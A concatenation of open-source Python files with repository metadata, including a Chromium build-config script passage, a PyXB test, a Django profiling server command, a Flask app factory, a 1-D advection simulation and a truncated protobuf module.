parser.add_option('--proguard-enabled', action='store_true',
help='Whether proguard is enabled for this apk.')
parser.add_option('--proguard-info',
help='Path to the proguard .info output for this apk.')
parser.add_option('--has-alternative-locale-resource', action='store_true',
help='Whether there is alternative-locale-resource in direct deps')
options, args = parser.parse_args(argv)
if args:
parser.error('No positional arguments should be given.')
required_options_map = {
'java_binary': ['build_config', 'jar_path'],
'java_library': ['build_config', 'jar_path'],
'android_assets': ['build_config'],
'android_resources': ['build_config', 'resources_zip'],
'android_apk': ['build_config', 'jar_path', 'dex_path', 'resources_zip'],
'deps_dex': ['build_config', 'dex_path'],
'resource_rewriter': ['build_config'],
'group': ['build_config'],
}
required_options = required_options_map.get(options.type)
if not required_options:
raise Exception('Unknown type: <%s>' % options.type)
if options.native_libs:
required_options.append('readelf_path')
build_utils.CheckOptions(options, parser, required_options)
if options.type == 'java_library':
if options.supports_android and not options.dex_path:
raise Exception('java_library that supports Android requires a dex path.')
if options.requires_android and not options.supports_android:
raise Exception(
'--supports-android is required when using --requires-android')
possible_deps_config_paths = build_utils.ParseGypList(
options.possible_deps_configs)
allow_unknown_deps = (options.type in
('android_apk', 'android_assets', 'android_resources'))
unknown_deps = [
c for c in possible_deps_config_paths if not os.path.exists(c)]
if unknown_deps and not allow_unknown_deps:
raise Exception('Unknown deps: ' + str(unknown_deps))
direct_deps_config_paths = [
c for c in possible_deps_config_paths if not c in unknown_deps]
direct_deps_config_paths = _FilterUnwantedDepsPaths(direct_deps_config_paths,
options.type)
deps = Deps(direct_deps_config_paths)
# Remove other locale resources if there is alternative_locale_resource in
# direct deps.
if options.has_alternative_locale_resource:
alternative = [r['path'] for r in deps.Direct('android_resources')
if r.get('is_locale_resource')]
# We can only have one locale resources in direct deps.
if len(alternative) != 1:
raise Exception('The number of locale resource in direct deps is wrong %d'
% len(alternative))
unwanted = [r['path'] for r in deps.All('android_resources')
if r.get('is_locale_resource') and r['path'] not in alternative]
for p in unwanted:
deps.RemoveNonDirectDep(p)
direct_library_deps = deps.Direct('java_library')
all_library_deps = deps.All('java_library')
direct_resources_deps = deps.Direct('android_resources')
all_resources_deps = deps.All('android_resources')
# Resources should be ordered with the highest-level dependency first so that
# overrides are done correctly.
all_resources_deps.reverse()
if options.type == 'android_apk' and options.tested_apk_config:
tested_apk_deps = Deps([options.tested_apk_config])
tested_apk_resources_deps = tested_apk_deps.All('android_resources')
all_resources_deps = [
d for d in all_resources_deps if not d in tested_apk_resources_deps]
# Initialize some common config.
config = {
'deps_info': {
'name': os.path.basename(options.build_config),
'path': options.build_config,
'type': options.type,
'deps_configs': direct_deps_config_paths
}
}
deps_info = config['deps_info']
if (options.type in ('java_binary', 'java_library') and
not options.bypass_platform_checks):
deps_info['requires_android'] = options.requires_android
deps_info['supports_android'] = options.supports_android
deps_require_android = (all_resources_deps +
[d['name'] for d in all_library_deps if d['requires_android']])
deps_not_support_android = (
[d['name'] for d in all_library_deps if not d['supports_android']])
if deps_require_android and not options.requires_android:
raise Exception('Some deps require building for the Android platform: ' +
str(deps_require_android))
if deps_not_support_android and options.supports_android:
raise Exception('Not all deps support the Android platform: ' +
str(deps_not_support_android))
if options.type in ('java_binary', 'java_library', 'android_apk'):
javac_classpath = [c['jar_path'] for c in direct_library_deps]
java_full_classpath = [c['jar_path'] for c in all_library_deps]
deps_info['resources_deps'] = [c['path'] for c in all_resources_deps]
deps_info['jar_path'] = options.jar_path
if options.type == 'android_apk' or options.supports_android:
deps_info['dex_path'] = options.dex_path
if options.type == 'android_apk':
deps_info['apk_path'] = options.apk_path
deps_info['incremental_apk_path'] = options.incremental_apk_path
deps_info['incremental_install_script_path'] = (
options.incremental_install_script_path)
# Classpath values filled in below (after applying tested_apk_config).
config['javac'] = {}
if options.type in ('java_binary', 'java_library'):
# Only resources might have srcjars (normal srcjar targets are listed in
# srcjar_deps). A resource's srcjar contains the R.java file for those
# resources, and (like Android's default build system) we allow a library to
# refer to the resources in any of its dependents.
config['javac']['srcjars'] = [
c['srcjar'] for c in direct_resources_deps if 'srcjar' in c]
if options.type == 'android_apk':
# Apks will get their resources srcjar explicitly passed to the java step.
config['javac']['srcjars'] = []
if options.type == 'android_assets':
all_asset_sources = []
if options.asset_renaming_sources:
all_asset_sources.extend(
build_utils.ParseGypList(options.asset_renaming_sources))
if options.asset_sources:
all_asset_sources.extend(build_utils.ParseGypList(options.asset_sources))
deps_info['assets'] = {
'sources': all_asset_sources
}
if options.asset_renaming_destinations:
deps_info['assets']['outputs'] = (
build_utils.ParseGypList(options.asset_renaming_destinations))
if options.disable_asset_compression:
deps_info['assets']['disable_compression'] = True
if options.type == 'android_resources':
deps_info['resources_zip'] = options.resources_zip
if options.srcjar:
deps_info['srcjar'] = options.srcjar
if options.android_manifest:
manifest = AndroidManifest(options.android_manifest)
deps_info['package_name'] = manifest.GetPackageName()
if options.package_name:
deps_info['package_name'] = options.package_name
if options.r_text:
deps_info['r_text'] = options.r_text
if options.is_locale_resource:
deps_info['is_locale_resource'] = True
if options.type in ('android_resources','android_apk', 'resource_rewriter'):
config['resources'] = {}
config['resources']['dependency_zips'] = [
c['resources_zip'] for c in all_resources_deps]
config['resources']['extra_package_names'] = []
config['resources']['extra_r_text_files'] = []
if options.type == 'android_apk' or options.type == 'resource_rewriter':
config['resources']['extra_package_names'] = [
c['package_name'] for c in all_resources_deps if 'package_name' in c]
config['resources']['extra_r_text_files'] = [
c['r_text'] for c in all_resources_deps if 'r_text' in c]
if options.type in ['android_apk', 'deps_dex']:
deps_dex_files = [c['dex_path'] for c in all_library_deps]
proguard_enabled = options.proguard_enabled
if options.type == 'android_apk':
deps_info['proguard_enabled'] = proguard_enabled
if proguard_enabled:
deps_info['proguard_info'] = options.proguard_info
config['proguard'] = {}
proguard_config = config['proguard']
proguard_config['input_paths'] = [options.jar_path] + java_full_classpath
# An instrumentation test apk should exclude the dex files that are in the apk
# under test.
if options.type == 'android_apk' and options.tested_apk_config:
tested_apk_library_deps = tested_apk_deps.All('java_library')
tested_apk_deps_dex_files = [c['dex_path'] for c in tested_apk_library_deps]
# Include in the classpath classes that are added directly to the apk under
# test (those that are not a part of a java_library).
tested_apk_config = GetDepConfig(options.tested_apk_config)
javac_classpath.append(tested_apk_config['jar_path'])
# Exclude dex files from the test apk that exist within the apk under test.
deps_dex_files = [
p for p in deps_dex_files if not p in tested_apk_deps_dex_files]
expected_tested_package = tested_apk_config['package_name']
AndroidManifest(options.android_manifest).CheckInstrumentation(
expected_tested_package)
if tested_apk_config['proguard_enabled']:
assert proguard_enabled, ('proguard must be enabled for instrumentation'
' apks if it\'s enabled for the tested apk')
# Dependencies for the final dex file of an apk or a 'deps_dex'.
if options.type in ['android_apk', 'deps_dex']:
config['final_dex'] = {}
dex_config = config['final_dex']
dex_config['dependency_dex_files'] = deps_dex_files
if options.type in ('java_binary', 'java_library', 'android_apk'):
config['javac']['classpath'] = javac_classpath
config['java'] = {
'full_classpath': java_full_classpath
}
if options.type == 'android_apk':
config['dist_jar'] = {
'dependency_jars': [
c['jar_path'] for c in all_library_deps
]
}
manifest = AndroidManifest(options.android_manifest)
deps_info['package_name'] = manifest.GetPackageName()
if not options.tested_apk_config and manifest.GetInstrumentation():
# This must then have instrumentation only for itself.
manifest.CheckInstrumentation(manifest.GetPackageName())
library_paths = []
java_libraries_list_holder = [None]
libraries = build_utils.ParseGypList(options.native_libs or '[]')
if libraries:
def recompute_ordered_libraries():
libraries_dir = os.path.dirname(libraries[0])
write_ordered_libraries.SetReadelfPath(options.readelf_path)
write_ordered_libraries.SetLibraryDirs([libraries_dir])
all_deps = (
write_ordered_libraries.GetSortedTransitiveDependenciesForBinaries(
libraries))
# Create a java literal array with the "base" library names:
# e.g. libfoo.so -> foo
java_libraries_list_holder[0] = ('{%s}' % ','.join(
['"%s"' % s[3:-3] for s in all_deps]))
library_paths.extend(
write_ordered_libraries.FullLibraryPath(x) for x in all_deps)
# This step takes about 600ms on a z620 for chrome_apk, so it's worth
# caching.
md5_check.CallAndRecordIfStale(
recompute_ordered_libraries,
record_path=options.build_config + '.nativelibs.md5.stamp',
input_paths=libraries,
output_paths=[options.build_config])
if not library_paths:
prev_config = build_utils.ReadJson(options.build_config)
java_libraries_list_holder[0] = (
prev_config['native']['java_libraries_list'])
library_paths.extend(prev_config['native']['libraries'])
config['native'] = {
'libraries': library_paths,
'java_libraries_list': java_libraries_list_holder[0],
}
config['assets'], config['uncompressed_assets'] = (
_MergeAssets(deps.All('android_assets')))
build_utils.WriteJson(config, options.build_config, only_if_changed=True)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
deps.AllConfigPaths() + build_utils.GetPythonDependencies())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| {
"content_hash": "81d61a8e8a2026378b9cb9f334139dc6",
"timestamp": "",
"source": "github",
"line_count": 524,
"max_line_length": 80,
"avg_line_length": 40.538167938931295,
"alnum_prop": 0.6805385556915544,
"repo_name": "highweb-project/highweb-webcl-html5spec",
"id": "baa535db6848fa78a9f283e847c6fb00f8fe968c",
"size": "21429",
"binary": false,
"copies": "3",
"ref": "refs/heads/highweb-20160310",
"path": "build/android/gyp/write_build_config.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.utils.domutils
import os.path
schema_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../schemas/test-include-dau.xsd'))
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
#open('code.py', 'w').write(code)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
class TestIncludeDD (unittest.TestCase):
def setUp (self):
self.__basis_log = logging.getLogger('pyxb.binding.basis')
self.__basis_loglevel = self.__basis_log.level
def tearDown (self):
self.__basis_log.level = self.__basis_loglevel
def testDefault (self):
xmls = '<entry xmlns="%s"><from>one</from><to>single</to></entry>' % (Namespace.uri(),)
# Default namespace applies to from which should be in no namespace
# Hide the warning from pyxb.binding.basis.complexTypeDefinition.append
# that it couldn't convert the DOM node to a binding.
self.__basis_log.setLevel(logging.ERROR)
self.assertRaises(pyxb.UnrecognizedContentError, CreateFromDocument, xmls.encode('utf-8'))
def testExplicit (self):
xmls = '<ns:entry xmlns:ns="%s"><from>one</from><ns:to>single</ns:to></ns:entry>' % (Namespace.uri(),)
instance = CreateFromDocument(xmls.encode('utf-8'))
self.assertEqual(english.one, instance.from_)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "054ee530a43f97d2b5612faf25842ac6",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 110,
"avg_line_length": 36.73809523809524,
"alnum_prop": 0.6694750486066104,
"repo_name": "balanced/PyXB",
"id": "b4297186756484a08140ccff24f588080b47df5b",
"size": "1567",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/drivers/test-include-dau.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "6286"
},
{
"name": "Python",
"bytes": "1854695"
},
{
"name": "Shell",
"bytes": "37524"
}
],
"symlink_target": ""
} |
__author__ = 'spencertank'
| {
"content_hash": "f60d9d459d5db76be6c4d91ae6f84323",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 26,
"avg_line_length": 27,
"alnum_prop": 0.6296296296296297,
"repo_name": "SEL-Columbia/commcare-hq",
"id": "ae0e3b8b88ece0f7fd57ef6c59aa1396b7618360",
"size": "27",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "corehq/apps/orgs/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "768322"
},
{
"name": "JavaScript",
"bytes": "2647080"
},
{
"name": "Python",
"bytes": "7806659"
},
{
"name": "Shell",
"bytes": "28569"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from flask import Flask
from werkzeug.serving import run_simple
from .views import Graphics
from flask_restful import Api
from flask_discoverer import Discoverer
from adsmutils import ADSFlask
def create_app(**config):
"""
Create the application and return it to the user
:return: flask.Flask application
"""
if config:
app = ADSFlask(__name__, static_folder=None, local_config=config)
else:
app = ADSFlask(__name__, static_folder=None)
app.url_map.strict_slashes = False
api = Api(app)
api.add_resource(Graphics, '/<string:bibcode>')
Discoverer(app)
return app
if __name__ == "__main__":
run_simple('0.0.0.0', 5555, create_app(), use_reloader=False, use_debugger=False)
| {
"content_hash": "21aed324b4a4c9319fad60f623b68633",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 85,
"avg_line_length": 25.225806451612904,
"alnum_prop": 0.6790281329923273,
"repo_name": "adsabs/graphics_service",
"id": "61029a2a36d25fc105487991100f5fca2d7d5597",
"size": "782",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "graphics_service/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "27351"
}
],
"symlink_target": ""
} |
"""
runprofileserver.py
Starts a lightweight Web server with profiling enabled.
Credits for kcachegrind support taken from lsprofcalltree.py go to:
David Allouche
Jp Calderone & Itamar Shtull-Trauring
Johan Dahlin
"""
import sys
from datetime import datetime
from django.conf import settings
from django.core.management.base import CommandError
from django_extensions.management.utils import signalcommand
from django_extensions.compat import CompatibilityBaseCommand as BaseCommand
try:
from django.contrib.staticfiles.handlers import StaticFilesHandler
USE_STATICFILES = 'django.contrib.staticfiles' in settings.INSTALLED_APPS
except ImportError as e:
USE_STATICFILES = False
class KCacheGrind(object):
def __init__(self, profiler):
self.data = profiler.getstats()
self.out_file = None
def output(self, out_file):
self.out_file = out_file
self.out_file.write('events: Ticks\n')
self._print_summary()
for entry in self.data:
self._entry(entry)
def _print_summary(self):
max_cost = 0
for entry in self.data:
totaltime = int(entry.totaltime * 1000)
max_cost = max(max_cost, totaltime)
self.out_file.write('summary: %d\n' % (max_cost,))
def _entry(self, entry):
out_file = self.out_file
code = entry.code
if isinstance(code, str):
out_file.write('fn=%s\n' % code)
else:
out_file.write('fl=%s\n' % code.co_filename)
out_file.write('fn=%s\n' % code.co_name)
inlinetime = int(entry.inlinetime * 1000)
if isinstance(code, str):
out_file.write('0 %s\n' % inlinetime)
else:
out_file.write('%d %d\n' % (code.co_firstlineno, inlinetime))
# recursive calls are counted in entry.calls
if entry.calls:
calls = entry.calls
else:
calls = []
if isinstance(code, str):
lineno = 0
else:
lineno = code.co_firstlineno
for subentry in calls:
self._subentry(lineno, subentry)
out_file.write("\n")
def _subentry(self, lineno, subentry):
out_file = self.out_file
code = subentry.code
if isinstance(code, str):
out_file.write('cfn=%s\n' % code)
out_file.write('calls=%d 0\n' % (subentry.callcount,))
else:
out_file.write('cfl=%s\n' % code.co_filename)
out_file.write('cfn=%s\n' % code.co_name)
out_file.write('calls=%d %d\n' % (subentry.callcount, code.co_firstlineno))
totaltime = int(subentry.totaltime * 1000)
out_file.write('%d %d\n' % (lineno, totaltime))
class Command(BaseCommand):
help = "Starts a lightweight Web server with profiling enabled."
args = '[optional port number, or ipaddr:port]'
def add_arguments(self, parser):
parser.add_argument(
'--noreload', action='store_false', dest='use_reloader',
default=True,
help='Tells Django to NOT use the auto-reloader.')
parser.add_argument(
'--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.')
parser.add_argument(
'--prof-path', dest='prof_path', default='/tmp',
help='Specifies the directory in which to save profile '
'information.')
parser.add_argument(
'--prof-file', dest='prof_file',
default='{path}.{duration:06d}ms.{time}',
help='Set filename format, default if '
'"{path}.{duration:06d}ms.{time}".')
parser.add_argument(
'--nomedia', action='store_true', dest='no_media', default=False,
help='Do not profile MEDIA_URL and ADMIN_MEDIA_URL')
parser.add_argument(
'--use-cprofile', action='store_true', dest='use_cprofile',
default=False,
help='Use cProfile if available, this is disabled per default '
'because of incompatibilities.')
parser.add_argument(
'--kcachegrind', action='store_true', dest='use_lsprof',
default=False,
help='Create kcachegrind compatible lsprof files, this requires '
'and automatically enables cProfile.')
if USE_STATICFILES:
parser.add_argument(
'--nostatic', action="store_false", dest='use_static_handler',
default=True,
help='Tells Django to NOT automatically serve static files '
'at STATIC_URL.')
parser.add_argument(
'--insecure', action="store_true", dest='insecure_serving',
default=False,
help='Allows serving static files even if DEBUG is False.')
@signalcommand
def handle(self, addrport='', *args, **options):
import django
import socket
import errno
from django.core.servers.basehttp import run
try:
from django.core.servers.basehttp import get_internal_wsgi_application as WSGIHandler
except ImportError:
from django.core.handlers.wsgi import WSGIHandler # noqa
try:
from django.core.servers.basehttp import AdminMediaHandler
HAS_ADMINMEDIAHANDLER = True
except ImportError:
HAS_ADMINMEDIAHANDLER = False
try:
from django.core.servers.basehttp import WSGIServerException as wsgi_server_exc_cls
except ImportError: # Django 1.6
wsgi_server_exc_cls = socket.error
if args:
raise CommandError('Usage is runprofileserver %s' % self.args)
if not addrport:
addr = ''
port = '8000'
else:
try:
addr, port = addrport.split(':')
except ValueError:
addr, port = '', addrport
if not addr:
addr = '127.0.0.1'
if not port.isdigit():
raise CommandError("%r is not a valid port number." % port)
use_reloader = options.get('use_reloader', True)
shutdown_message = options.get('shutdown_message', '')
no_media = options.get('no_media', False)
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
def inner_run():
import os
import time
try:
import hotshot
HAS_HOTSHOT = True
except ImportError:
HAS_HOTSHOT = False # python 3.x
USE_CPROFILE = options.get('use_cprofile', False)
USE_LSPROF = options.get('use_lsprof', False)
if USE_LSPROF:
USE_CPROFILE = True
if USE_CPROFILE:
try:
import cProfile
USE_CPROFILE = True
except ImportError:
print("cProfile disabled, module cannot be imported!")
USE_CPROFILE = False
if USE_LSPROF and not USE_CPROFILE:
raise CommandError("Kcachegrind compatible output format required cProfile from Python 2.5")
if not HAS_HOTSHOT and not USE_CPROFILE:
raise CommandError("Hotshot profile library not found. (and not using cProfile)")
prof_path = options.get('prof_path', '/tmp')
prof_file = options.get('prof_file', '{path}.{duration:06d}ms.{time}')
# A malformed format string raises rather than returning something falsy, so fall back on error.
try:
prof_file.format(path='1', duration=2, time=3)
except (KeyError, IndexError, ValueError):
prof_file = '{path}.{duration:06d}ms.{time}'
print("Filename format is wrong. Default format used: '{path}.{duration:06d}ms.{time}'.")
def get_exclude_paths():
exclude_paths = []
media_url = getattr(settings, 'MEDIA_URL', None)
if media_url:
exclude_paths.append(media_url)
static_url = getattr(settings, 'STATIC_URL', None)
if static_url:
exclude_paths.append(static_url)
admin_media_prefix = getattr(settings, 'ADMIN_MEDIA_PREFIX', None)
if admin_media_prefix:
exclude_paths.append(admin_media_prefix)
return exclude_paths
def make_profiler_handler(inner_handler):
def handler(environ, start_response):
path_info = environ['PATH_INFO']
                    # when using something like a dynamic site middleware, it could be necessary
                    # to re-fetch the exclude_paths every time since they could change per site.
if no_media and any(path_info.startswith(p) for p in get_exclude_paths()):
return inner_handler(environ, start_response)
path_name = path_info.strip("/").replace('/', '.') or "root"
profname = "%s.%d.prof" % (path_name, time.time())
profname = os.path.join(prof_path, profname)
if USE_CPROFILE:
prof = cProfile.Profile()
else:
prof = hotshot.Profile(profname)
start = datetime.now()
try:
return prof.runcall(inner_handler, environ, start_response)
finally:
# seeing how long the request took is important!
elap = datetime.now() - start
elapms = elap.seconds * 1000.0 + elap.microseconds / 1000.0
if USE_LSPROF:
kg = KCacheGrind(prof)
with open(profname, 'w') as f:
kg.output(f)
elif USE_CPROFILE:
prof.dump_stats(profname)
profname2 = prof_file.format(path=path_name, duration=int(elapms), time=int(time.time()))
profname2 = os.path.join(prof_path, "%s.prof" % profname2)
if not USE_CPROFILE:
prof.close()
os.rename(profname, profname2)
return handler
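            # Example (assuming the default prof_path='/tmp' and prof_file
            # format, with cProfile enabled): profiling a request to
            # "/api/users/" first dumps stats to
            # "/tmp/api.users.<timestamp>.prof" and, once the elapsed
            # milliseconds are known, renames it to something like
            # "/tmp/api.users.000042ms.<timestamp>.prof".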
print("Validating models...")
if hasattr(self, 'check'):
self.check(display_num_errors=True)
else:
self.validate(display_num_errors=True)
print("\nDjango version %s, using settings %r" % (django.get_version(), settings.SETTINGS_MODULE))
print("Development server is running at http://%s:%s/" % (addr, port))
print("Quit the server with %s." % quit_command)
path = options.get('admin_media_path', '')
if not path:
admin_media_path = os.path.join(django.__path__[0], 'contrib/admin/static/admin')
if os.path.isdir(admin_media_path):
path = admin_media_path
else:
path = os.path.join(django.__path__[0], 'contrib/admin/media')
try:
handler = WSGIHandler()
if HAS_ADMINMEDIAHANDLER:
handler = AdminMediaHandler(handler, path)
if USE_STATICFILES:
use_static_handler = options.get('use_static_handler', True)
insecure_serving = options.get('insecure_serving', False)
if use_static_handler and (settings.DEBUG or insecure_serving):
handler = StaticFilesHandler(handler)
handler = make_profiler_handler(handler)
run(addr, int(port), handler)
except wsgi_server_exc_cls as e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
errno.EACCES: "You don't have permission to access that port.",
errno.EADDRINUSE: "That port is already in use.",
errno.EADDRNOTAVAIL: "That IP address can't be assigned-to.",
}
if not isinstance(e, socket.error): # Django < 1.6
ERRORS[13] = ERRORS.pop(errno.EACCES)
ERRORS[98] = ERRORS.pop(errno.EADDRINUSE)
ERRORS[99] = ERRORS.pop(errno.EADDRNOTAVAIL)
try:
if not isinstance(e, socket.error): # Django < 1.6
error_text = ERRORS[e.args[0].args[0]]
else:
error_text = ERRORS[e.errno]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
print(shutdown_message)
sys.exit(0)
if use_reloader:
from django.utils import autoreload
autoreload.main(inner_run)
else:
inner_run()
| {
"content_hash": "ab682f113cd00517fba2e66f8096e7f3",
"timestamp": "",
"source": "github",
"line_count": 316,
"max_line_length": 113,
"avg_line_length": 41.90506329113924,
"alnum_prop": 0.5416855459900317,
"repo_name": "jpadilla/django-extensions",
"id": "f08b81e13166f8d022f2c4c466035658cebbb330",
"size": "13257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_extensions/management/commands/runprofileserver.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "741"
},
{
"name": "HTML",
"bytes": "2168"
},
{
"name": "JavaScript",
"bytes": "39590"
},
{
"name": "Python",
"bytes": "468181"
}
],
"symlink_target": ""
} |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numerical_schemes
""" Define simulation parameters """
dt = 0.1 # s time step
dx = 0.5 # m spatial resolution
# Domain
x_w = - 15
x_e = 15
""" Initialize, dimensions, coordinates and variables """
x_dim = int((x_e - x_w)//dx)
C = np.zeros(x_dim, order='F')
x = np.linspace(x_w, x_e, x_dim)
u = np.zeros(x_dim,order='F')
""" choices of initial conditions """
C[x_dim//2:x_dim//2+10] = 1 # Step function
#C = np.random.random(x_dim) # Pulse of random values
# Wind distribution
u = [1 - 1/(1 + x**2) if x >= 0 else 0 for x in x]
""" Prepare the animation plot """
fig, ax = plt.subplots()
line, = ax.plot([],[], lw=2, label='C')
text = ax.text(0.20, 0.95, '', horizontalalignment='center',
verticalalignment='center', transform = ax.transAxes)
FONTSIZE = 16 # Plot fontsizes
animation_interval = 0 # Go as fast as possible
# Plot the wind distribution
ax.plot(x, u, label='Wind distribution')
def Init():
ax.set_xlim(x_w, x_e)
ax.set_ylim(0, 1.2)
ax.set_xlabel("x-axis position [m]", fontsize=FONTSIZE)
ax.set_ylabel("C", fontsize=FONTSIZE)
ax.set_title("One-dimensional advection simulation", fontsize=FONTSIZE)
ax.legend(loc='upper right')
line.set_data(x, C)
return line,
""" Simulation """
def Run(i):
global C
C = numerical_schemes.step_ftbs(dx, dt, u, C)
line.set_data(x, C)
text.set_text('Current time: ' + str(int(dt*i)) + ' s')
return line, text
ani = animation.FuncAnimation(fig, Run, frames=10**100,
interval=animation_interval, blit=True, init_func=Init)
plt.show()
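# Reference sketch (an assumption about the external module, not its actual
# code): for u >= 0, numerical_schemes.step_ftbs is expected to apply the
# forward-in-time, backward-in-space (upwind) update
#   C_i^{n+1} = C_i^n - u_i * dt/dx * (C_i^n - C_{i-1}^n)
# which in NumPy terms looks roughly like this:
def _ftbs_reference(dx, dt, u, C):
    """Advance C one time step with the upwind (FTBS) scheme."""
    u = np.asarray(u)
    C_new = np.copy(C)
    C_new[1:] = C[1:] - u[1:] * dt / dx * (C[1:] - C[:-1])
    return C_new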
| {
"content_hash": "8cde291d63ba29745e215d94c24b8317",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 75,
"avg_line_length": 30.4,
"alnum_prop": 0.6453349282296651,
"repo_name": "asura6/Fortran-Python-Advection-and-Diffusion-Models",
"id": "2762a2a79a42eb91e7353d23df71dccd4dbaf754",
"size": "1672",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Program_2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Fortran",
"bytes": "3476"
},
{
"name": "Makefile",
"bytes": "603"
},
{
"name": "Python",
"bytes": "9512"
}
],
"symlink_target": ""
} |
from prestans.http import STATUS
from prestans.rest import RequestHandler
import pytest
import unittest
class NoContentHandler(RequestHandler):
def get(self):
self.response.status = STATUS.NO_CONTENT
def test_app():
from webtest import TestApp
from prestans.rest import RequestRouter
api = RequestRouter([
('/no-content', NoContentHandler)
], application_name="api", debug=True)
return TestApp(app=api)
class Issue154(unittest.TestCase):
def test_204_header_omitted(self):
"""
        Request should return no content and omit the Content-Type header
"""
app = test_app()
resp = app.get('/no-content')
self.assertEqual(resp.status_int, STATUS.NO_CONTENT)
self.assertIsNone(resp.content_type)
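# Example invocation (assuming pytest and WebTest are installed in the
# development environment):
#   pytest tests/issues/test_issue154.py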
| {
"content_hash": "39304233c3b2f6b074c264b6f6a64e7a",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 64,
"avg_line_length": 23.823529411764707,
"alnum_prop": 0.6518518518518519,
"repo_name": "anomaly/prestans",
"id": "7dfdbb5f7a5d306f3c9cba3afeb8840dab331553",
"size": "810",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/issues/test_issue154.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "44024"
},
{
"name": "Makefile",
"bytes": "1131"
},
{
"name": "Python",
"bytes": "531098"
}
],
"symlink_target": ""
} |
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='kv.proto',
package='bookkeeper.proto.kv',
syntax='proto3',
serialized_options=_b('\n%org.apache.bookkeeper.stream.proto.kvP\001'),
serialized_pb=_b('\n\x08kv.proto\x12\x13\x62ookkeeper.proto.kv\"\x8f\x01\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\x0c\x12\x17\n\x0f\x63reate_revision\x18\x02 \x01(\x03\x12\x14\n\x0cmod_revision\x18\x03 \x01(\x03\x12\x0f\n\x07version\x18\x04 \x01(\x03\x12\r\n\x05value\x18\x05 \x01(\x0c\x12\x11\n\tis_number\x18\x06 \x01(\x08\x12\x14\n\x0cnumber_value\x18\x07 \x01(\x03\"\xb8\x01\n\x05\x45vent\x12\x32\n\x04type\x18\x01 \x01(\x0e\x32$.bookkeeper.proto.kv.Event.EventType\x12)\n\x02kv\x18\x02 \x01(\x0b\x32\x1d.bookkeeper.proto.kv.KeyValue\x12.\n\x07prev_kv\x18\x03 \x01(\x0b\x32\x1d.bookkeeper.proto.kv.KeyValue\" \n\tEventType\x12\x07\n\x03PUT\x10\x00\x12\n\n\x06\x44\x45LETE\x10\x01\x42)\n%org.apache.bookkeeper.stream.proto.kvP\x01\x62\x06proto3')
)
_EVENT_EVENTTYPE = _descriptor.EnumDescriptor(
name='EventType',
full_name='bookkeeper.proto.kv.Event.EventType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PUT', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETE', index=1, number=1,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=332,
serialized_end=364,
)
_sym_db.RegisterEnumDescriptor(_EVENT_EVENTTYPE)
_KEYVALUE = _descriptor.Descriptor(
name='KeyValue',
full_name='bookkeeper.proto.kv.KeyValue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='bookkeeper.proto.kv.KeyValue.key', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='create_revision', full_name='bookkeeper.proto.kv.KeyValue.create_revision', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mod_revision', full_name='bookkeeper.proto.kv.KeyValue.mod_revision', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
